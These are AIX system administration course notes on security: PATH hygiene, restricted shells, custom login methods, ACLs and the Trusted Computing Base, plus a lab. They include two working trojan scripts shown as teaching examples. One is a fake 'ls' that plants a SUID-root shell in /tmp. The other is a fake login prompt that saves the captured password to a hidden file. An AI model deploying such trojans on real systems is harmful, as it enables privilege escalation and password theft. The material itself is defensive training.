AIX 5L SysAdmin II: (Unit 12) – Security

Unit Objectives:
———————–
1. Provide Authentication Procedures
2. Specify Extended File Permissions
3. Configure the Trusted Computing Base (TCB)

Protecting Your System:
————————————
Hardware – Access to boot media, Access to front key
Login – Passwords, System logged in but not used, Trojan horse
Shell – Restricted shell, Execution of unauthorized programs, Trojan

How Do You Set Up Your PATH?
————————————————-
Which Path is more secure?

PATH=/usr/bin:/etc:/usr/sbin:/sbin:. or
PATH=.:/usr/bin:/etc:/usr/sbin:/sbin (Don’t ever use this path)

Note: It is better to not use either one because they both include the current directory “.” which could be anywhere.

Trojan Horse: An Easy Example (1 of 3)
———————————————————–
cd /home/hacker
vi ls
#!/usr/bin/ksh

cp /usr/bin/ksh /tmp/.hacker
chown root /tmp/.hacker
chmod u+s /tmp/.hacker

rm -f $0
/usr/bin/ls $*

chmod a+x ls

Note: u+s above – SUID-Bit: Runs under root authority

Trojan Horse: An Easy Example (2 of 3)
———————————————————-
Hacker creates a -i file
cd /home/hacker
cat > -i
blablaba

Hello SysAdmin, I have a file “-i” and cannot remove it. Please help me…

PATH=.:/usr/bin:/etc:/usr/sbin:/sbin (Don’t use this PATH!!!)
Actually runs the ls script in the /home/hacker directory instead of the ls command.

cd /home/hacker
ls
-i
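A PATH audit written as an added example for this unit (it is not part of the course notes): it reports the entries that let the ls trojan above shadow /usr/bin/ls. The function names and the world-writable check are my own; it needs only POSIX sh and ls.

```shell
#!/bin/sh
# Added example, not from the course notes: audit a PATH value for the entries
# that let the "ls" trojan above run in place of /usr/bin/ls. It flags the
# current directory, empty components (an empty component also means "."),
# relative directories and directories that any user can write to.

# Print one "<reason>:<entry>" line per unsafe entry of the PATH string in $1.
# Directories that do not exist are skipped; a directory with the sticky bit
# set (as /tmp usually has) is not reported as world-writable.
audit_path() {
    printf '%s\n' "$1" | tr ':' '\n' | while IFS= read -r _e; do
        case $_e in
            '')    printf 'empty-component:\n' ;;
            .)     printf 'current-dir:.\n' ;;
            [!/]*) printf 'relative:%s\n' "$_e" ;;
            *)
                [ -d "$_e" ] || continue
                # Mode string from ls -ldL (symlinks followed): character 9 is
                # the "others" write bit, character 10 is t/T when sticky.
                _mode=$(ls -ldL "$_e" | cut -c1-10)
                case $_mode in
                    ????????w[x-]) printf 'world-writable:%s\n' "$_e" ;;
                esac ;;
        esac
    done
}

# True (exit 0) when the audit finds nothing to report.
path_is_safe() { [ -z "$(audit_path "$1")" ]; }

# Example run on the two PATH settings from the slide (both are unsafe).
audit_path ".:/usr/bin:/etc:/usr/sbin:/sbin"
audit_path "/usr/bin:/etc:/usr/sbin:/sbin:."
```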

login.cfg: Login Prompts
——————————————
# vi /etc/security/login.cfg

default:
sak_enabled = false
logintimes =
…..
herald = "\n*Restricted Access*\n\rAuthorized Users Only\n\rLogin:"

login.cfg: Restricted Shell
—————————————
# vi /etc/security/login.cfg

Other security attributes
usw:
shells = /bin/sh,/bin/bsh,/usr/bin/ksh, …,/usr/bin/Rsh

# chuser shell=/usr/bin/Rsh michael
michael can’t:
– Change the current directory
– Change the PATH variable
– Use command names containing slashes
– Redirect standard output (>,>>)

Customized Authentication:
—————————————–
# vi /usr/lib/security/methods.cfg
* Authentication Methods
secondPassword:
program = /usr/local/bin/getSecondPassword

# vi /etc/security/user
michael:
auth1 = SYSTEM,secondPassword

Note: This activates a second program to authenticate users.

Authentication Methods (1 of 2):
————————————————
# vi /usr/local/bin/getSecondPassword

#!/usr/bin/ksh
# Second authentication method, run by login after the SYSTEM method
print -n "Please enter the second Password: "
stty -echo # No input visible
read PASSWORD
stty echo
print # New line after the hidden input

if [[ $PASSWORD = "d1f2g3" ]]; then
exit 0 # Valid login
else
exit 255 # Invalid login
fi

Authentication Methods (2 of 2):
———————————————–
# vi /usr/local/bin/limitLogins

#!/usr/bin/ksh
# Limit login to one session per user
USER=$1 # User name is first argument
# How often is the user logged in? (the trailing space stops "michael" matching "michaela")
COUNT=$(who | grep "^$USER " | wc -l)
# User already logged in?
if [[ $COUNT -ge 1 ]]; then
errlogger "$1 tried more than 1 login"
print "Only one login is allowed"
exit 128
fi

exit 0 # Return 0 for correct authentication

Two-Key Authentication:
————————————
# vi /etc/security/user

boss:
auth1 = SYSTEM;deputy1,SYSTEM;deputy2

login: boss
deputy1’s Password:
deputy2’s Password:

Base Permissions:
—————————–
salaries

owner = silva
group = staff
Base permissions = rwx (owner) --- (group) --- (others)
How can silva easily give simon read access to the file salaries?

Setting up permissions for the group will give access to all in the group. But what if you only want one person to

Extended Permissions: Access Control Lists
——————————————————————
Extended Permissions: permit r-- u:simon
# acledit salaries
base permissions

extended permissions
enabled
permit r-- u:simon

ACL Commands:
————————-
# aclget file1 – Display base/extended permissions
# aclget status99 | aclput report99 – Copy an Access Control List
# acledit salaries2 – To specify extended permissions

– chmod in the octal format disables ACLs (Use chmod u+x salaries instead of chmod 777 salaries)
– Only the backup command saves ACLs
– acledit requires the EDITOR variable (full pathname of an AIX editor)

ACL Keywords: permit and specify:
—————————————————-
# acledit status99

attributes:
base permissions

extended permissions
enabled
permit --x u:michael
specify r-- u:anne,g:account
specify r-- u:nadine

– michael (member in the group finance) gets read, write (base) and execute (extended) permissions.
– If anne is in group account, she gets read permissions on file status99
– nadine (member in group finance) gets only read access

ACL Keywords: deny
———————————
# acledit report99
attributes:
base permissions

extended permissions
enabled
deny r-- u:paul,g:mail
deny r– g:gateway

– deny: Restricts the user or group from using the specified access to the file
– deny overrules permit and specify
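An added example, not from the course notes, that models how the permit, specify and deny keywords of the two slides above combine for one user. The base permissions, group memberships and function names are assumptions; the ACL text is constructed after the status99 and report99 slides, and this is a model of the stated rules, not the AIX kernel's own check.

```shell
#!/bin/sh
# Added example, not from the course notes: how permit, specify and deny combine
# for one user. The requester starts with the base permissions of their class
# (owner, group or others); matching permit entries add bits; a matching specify
# entry grants exactly its bits and denies the rest; deny bits win over all.
# ACL text, base permissions and group memberships are constructed (assumed).
has() { case $1 in *"$2"*) return 0 ;; *) return 1 ;; esac; }   # substring test

# Every identifier of an entry such as "u:anne,g:account" must match the
# requester: $1=identifiers $2=user $3=space-separated groups of that user.
entry_matches() {
    for _id in $(printf '%s' "$1" | tr ',' ' '); do
        case $_id in u:*) [ "${_id#u:}" = "$2" ] || return 1 ;;
                     g:*) has " $3 " " ${_id#g:} " || return 1 ;; *) return 1 ;; esac
    done
}

# Print the effective rwx rights of user $2 (groups $3) on the ACL text in $1.
effective_access() {
    allow='' deny='' cls='' enabled=no
    while read -r kw bits rest; do
        n=${kw#*\[}; n=${n%%]*}                 # name inside owner[...] / group[...]
        case $kw in
            owner\[*) [ "$n" = "$2" ] && { cls=owner; allow=$bits; } ;;
            group\[*) [ -z "$cls" ] && has " $3 " " $n " && { cls=group; allow=$bits; } ;;
            others:)  [ -z "$cls" ] && { cls=others; allow=$bits; } ;;
            enabled)  enabled=yes ;;
            permit|specify|deny)
                [ "$enabled" = yes ] || continue
                entry_matches "$(printf '%s' "$rest" | tr -d ' ')" "$2" "$3" || continue
                [ "$kw" = deny ] && deny=$deny$bits || allow=$allow$bits
                [ "$kw" = specify ] && for c in r w x; do has "$bits" "$c" || deny=$deny$c; done ;;
        esac
    done <<EOF
$1
EOF
    out=''; for c in r w x; do
        if has "$allow" "$c" && ! has "$deny" "$c"; then out=$out$c; else out=$out-; fi
    done; printf '%s\n' "$out"
}

# Constructed ACL (only the acledit lines that carry permissions are kept).
ACL_STATUS99='owner[silva]: rwx
group[finance]: rw-
others: ---
enabled
permit --x u:michael
specify r-- u:anne,g:account
specify r-- u:nadine
deny r-- u:paul,g:mail'
```

Run for instance `effective_access "$ACL_STATUS99" nadine finance`, which prints `r--`: the group base permissions rw- are cut down by the specify entry, as the slide states.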

The Trusted Computing Base (TCB):
—————————————————–
The TCB is the part of the system that is responsible for enforcing the security policies of the system

# ls -l /etc/passwd
-rw-r--rw- 1 root security … /etc/passwd

# ls -l /usr/bin/be_happy
-r-sr-xr-x 1 root system … /usr/bin/be_happy

Note: TCB is installed with the operating system but has to be enabled.

TCB Components:
—————————-
The AIX Kernel
Configuration files that control AIX
Any program that alters the kernel or an AIX configuration file

The TCB can only be enabled at installation time. You cannot switch it on or off later; the only way is re-installation.

Note: 98% of users don’t enable TCB. Only used for very secure environments.

Checking the Trusted Computing Base:
———————————————————-
– Reports differences
– Implements fixes

Security Model (/etc/security/sysck.cfg, checked by tcbck):
/etc/passwd:
owner = root
mode = 644

Reality:
/etc/passwd rw-r--r--

The sysck.cfg File
—————————-
# vi /etc/security/sysck.cfg

/etc/passwd:
owner = root
group = security
mode = TCB, 644
type = FILE
class = apply, inventory, bos.rte.security
checksum = VOLATILE
size = VOLATILE

# tcbck -t /etc/passwd (Verifies files)

Note: TCB will always check to make sure that nothing has changed.

tcbck: Checking Mode Examples:
—————————————————
tcbck -n <what> Report (Y) Fix (N)
tcbck -p <what> Report (N) Fix (Y)
tcbck -t <what> Report (Y) Fix (prompt)
tcbck -y <what> Report (Y) Fix (Y)

<what> can be:
– a filename (for example /etc/passwd)
– a classname: Logical group of files defined by a class = name in sysck.cfg
– tree: Check all files in the filesystem tree
– ALL: Check all files listed in sysck.cfg
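An added example, not from the course notes: a report-only checker in the spirit of tcbck -n that reads a sysck.cfg-style stanza like the one shown above and compares owner, group and mode with what the filesystem reports. The stanza keys follow the page; the function names are my own, and it verifies far less than the real tcbck.

```shell
#!/bin/sh
# Added example, not from the course notes: a checker in the spirit of
# "tcbck -n" that compares the owner, group and mode recorded in a
# sysck.cfg-style stanza (the security model) with what the filesystem
# reports (the reality), printing one line per difference. It understands
# only owner, group and the last three octal digits of mode; AIX's own tcbck
# also verifies type, class, checksum and size.

# Turn an octal mode such as 644 into the rwxrwxrwx form printed by ls -l.
octal_to_symbolic() {
    _m=$1; while [ ${#_m} -gt 3 ]; do _m=${_m#?}; done     # keep last 3 digits
    _out=''
    for _d in $(printf '%s' "$_m" | sed 's/./& /g'); do
        case $_d in 0) _out="${_out}---" ;; 1) _out="${_out}--x" ;; 2) _out="${_out}-w-" ;;
                    3) _out="${_out}-wx" ;; 4) _out="${_out}r--" ;; 5) _out="${_out}r-x" ;;
                    6) _out="${_out}rw-" ;; 7) _out="${_out}rwx" ;; esac
    done
    printf '%s\n' "$_out"
}

# Check one stanza given as text in $1, written as in sysck.cfg above:
#   /etc/passwd:
#       owner = root
#       group = security
#       mode = TCB, 644
check_stanza() {
    file='' want_owner='' want_group='' want_mode=''
    while read -r key eq val; do
        case $key in
            /*:)   file=${key%:} ;;
            owner) want_owner=$val ;;
            group) want_group=$val ;;
            mode)  want_mode=$(printf '%s' "${val##*,}" | tr -d ' ') ;;   # "TCB, 644" -> 644
        esac
    done <<EOF
$1
EOF
    [ -e "$file" ] || { printf '%s: missing\n' "$file"; return 0; }
    set -- $(ls -ld "$file")                 # $1=mode string  $3=owner  $4=group
    mode=$(printf '%s' "$1" | cut -c2-10)
    [ -z "$want_owner" ] || [ "$want_owner" = "$3" ] ||
        printf '%s: owner expected %s found %s\n' "$file" "$want_owner" "$3"
    [ -z "$want_group" ] || [ "$want_group" = "$4" ] ||
        printf '%s: group expected %s found %s\n' "$file" "$want_group" "$4"
    [ -z "$want_mode" ] || [ "$(octal_to_symbolic "$want_mode")" = "$mode" ] ||
        printf '%s: mode expected %s found %s\n' "$file" "$(octal_to_symbolic "$want_mode")" "$mode"
}
```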

tcbck: Update Mode Examples:
———————————————-
# tcbck -a /salary/salary.dat class=salary
Add salary.dat to sysck.cfg in the class salary

# tcbck -t salary – Test all files belonging to class salary
# tcbck -d /etc/cvid – Delete file /etc/cvid from sysck.cfg

Note: TCB requires a lot of maintenance as it is used.

chtcb: Marking Files As Trusted
———————————————–
# ls -le /salary/salary.dat
-rw-rw----- – Not trusted (11th character is "-")
-rw-rw----+ – Trusted file (11th character is "+")

tcbck: Effective Usage:
———————————-
tcbck -n (Normal mode)
tcbck -t (Interactive mode)
Paranoid Use – Store the sysck.cfg file offline and restore it periodically to check out the system.

Trusted Communication Path:
——————————————–
The Trusted Communication Path allows for secure communication between users and the Trusted Computing Base.

What do you think when you see this screen on a terminal?

AIX Version 4
(C) Copyrights by IBM and by others 1982, 1996
login:

Note: This could be a Trojan horse script that will steal my login and password.

Trusted Communication Path: Trojan Horse
—————————————————————-
#!/usr/bin/ksh

print "AIX Version 4"
print "(C) Copyrights by IBM and by others 1982, 1996"
print -n "login:"
read NAME
print -n "$NAME's Password:"
stty -echo
read PASSWORD
stty echo
print $PASSWORD > /tmp/.4711

$ cat /tmp/.4711
darth22

Trusted Communication Path Elements:
———————————————————-
1. A trusted shell (tsh) that only executes commands that are marked as being trusted
2. A trusted terminal
3. A reserved key sequence, called the secure attention key (SAK), which allows the user to request a trusted communication path

Using the Secure Attention Key (SAK)
———————————————————
Before logging in at the trusted terminal:

tsh>
Previous login was a trojan horse.

Ensures that no untrusted programs will be run with root authority.

Configuring the Secure Attention Key:
——————————————————-
Configure a trusted terminal:
# vi /etc/security/login.cfg
/dev/tty0:
sak_enabled = true

Enable a user to use the trusted shell:
# vi /etc/security/user
root:
tpath = on

chtcb: Changing the TCB Attribute:
—————————————————-
# chtcb query /usr/bin/ls
/usr/bin/ls is not in the TCB

tsh>ls *.c
ls: Command must be trusted to run in the tsh

# chtcb on /usr/bin/ls
tsh>ls *.c
a.c b.c d.c

FAQs:
———-
Q: How do I install the TCB fileset on my machine?
A: You cannot add TCB to an existing installation. TCB must be installed at the same time the operating system is installed; you will be prompted during installation.
Q: Are my files secure on my backup tapes?
A: You need to physically protect your data on your backup tapes.

Q: Why don’t we address auth2 very much?
A: Auth2 is not a security feature. Auth2 allows you to collect information during the login process.

Lab:
——–
vi /etc/security/login.cfg

default:
sak_enabled = false
logintimes =
logindisable = 0
logininterval = 0
loginreenable = 0
logindelay = 0
herald = "\n\n\n\n# Restricted Access #\n\rAuthorized Users Only\n\r"

:wq
exit
Relogin

# Restricted Access #
Authorized Users Only
Login:_

who /etc/security/failedlogin | more
more /var/adm/sulog

who /var/adm/wtmp | more
last root

vi /home/workshop/ex14_login (view the file)
ls -l /home/workshop/ex14_login (check permission)

vi /usr/lib/security/methods.cfg
COUNT:
program = /home/workshop/ex14_login
:wq

vi /etc/security/user
team01:
admin = false
auth1 = SYSTEM,COUNT
:wq

startx (start AIX Windows)
login as team01
login again as team01
Only one login allowed per user….
whoami
team01
exit

vi /etc/security/user (remove previous entry from team01 stanza)
:wq

mkuser michael (create a new user)
mkuser sarah
passwd michael (create passwords for michael)
passwd sarah

su team01
cd /home/team01
vi sample
tput clear
banner We love AIX
print End of Program
:wq

chmod 777 sample
ls -l sample
sample (execute the script)
chmod 700 sample
exit

Login as michael
pwd
/home/michael
cd /home/team01
cat sample
ls -l /home/team01/sample
exit

Login as team01
vi .profile
export EDITOR=/usr/bin/vi
:wq

. ./.profile (re-execute the profile in the current shell)

echo $EDITOR (check to make sure it is set)
/usr/bin/vi

acledit sample
attributes
base permissions
owner[team01]: rwx
group[staff]: ---
others: ---
extended permissions
enabled
permit rwx u:michael
permit r-x u:sarah
:wq
Should the modified ACL be applied? (yes) or (no) y
ls -e sample
-rwx------+ 1 team01 staff (+ says that ACL is enabled)
exit

login as michael
cd /home/team01
vi sample
date (add command)
:wq

./sample (re-execute)
exit

login as sarah
cd /home/team01
vi sample
echo This is from sarah (add command)
:wq
The file has read permission only. error
:q!
exit

login as team01
acledit sample
attributes
base permissions
owner[team01]: rwx
group[staff]: r-x
others: —
extended permissions
enabled
deny rwx u:michael
:wq
Should the modified ACL be applied? (yes) or (no) y
exit

login as michael
$ groups
staff
cd /home/team01

ls -l sample
-rwxr-x--- 1 team01 staff
./sample
./sample: 0403-006 Execute permission denied.
exit

login as team01
vi sample2
echo hello class
echo today is date
echo goodbye
:wq

aclget sample2
attributes:
base permissions
owner[team01]: rw-
group[staff]: r--
others: r--
extended permissions
disabled

aclget sample | aclput sample2
aclget sample2

chmod 700 sample (Lose ACL permissions using octal notation)
aclget sample
Note: It changed enabled to disabled in the ACL. Instead use the symbolic notation when changing permissions.
